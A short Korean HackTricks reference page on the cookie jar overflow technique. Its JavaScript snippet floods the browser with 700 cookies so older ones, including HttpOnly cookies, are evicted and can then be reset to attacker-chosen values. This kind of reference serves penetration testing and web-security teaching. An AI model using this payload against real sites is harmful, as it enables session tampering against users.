Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๋ธŒ๋ผ์šฐ์ €๋Š” ํŽ˜์ด์ง€์— ์ €์žฅํ•  ์ˆ˜ ์žˆ๋Š” ์ฟ ํ‚ค์˜ ์ˆ˜์— ์ œํ•œ์ด ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์–ด๋–ค ์ด์œ ๋กœ ์ฟ ํ‚ค๋ฅผ ์‚ฌ๋ผ์ง€๊ฒŒ ํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ, ์ฟ ํ‚ค ํ•ญ์•„๋ฆฌ๋ฅผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐํ•˜์—ฌ ๊ฐ€์žฅ ์˜ค๋ž˜๋œ ์ฟ ํ‚ค๊ฐ€ ์‚ญ์ œ๋˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

ํƒ€์‚ฌ ์ฟ ํ‚ค๊ฐ€ ๋‹ค๋ฅธ ๋„๋ฉ”์ธ์„ ๊ฐ€๋ฆฌํ‚ค๋Š” ๊ฒฝ์šฐ ๋ฎ์–ด์“ฐ์ด์ง€ ์•Š์Œ์„ ์œ ์˜ํ•˜์„ธ์š”.

Caution

์ด ๊ณต๊ฒฉ์€ HttpOnly ์ฟ ํ‚ค๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ฟ ํ‚ค๋ฅผ ์‚ญ์ œํ•œ ๋‹ค์Œ ์›ํ•˜๋Š” ๊ฐ’์œผ๋กœ ์žฌ์„ค์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ์‹คํ—˜์‹ค์ด ํฌํ•จ๋œ ๊ฒŒ์‹œ๋ฌผ์—์„œ ํ™•์ธํ•˜์„ธ์š”.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ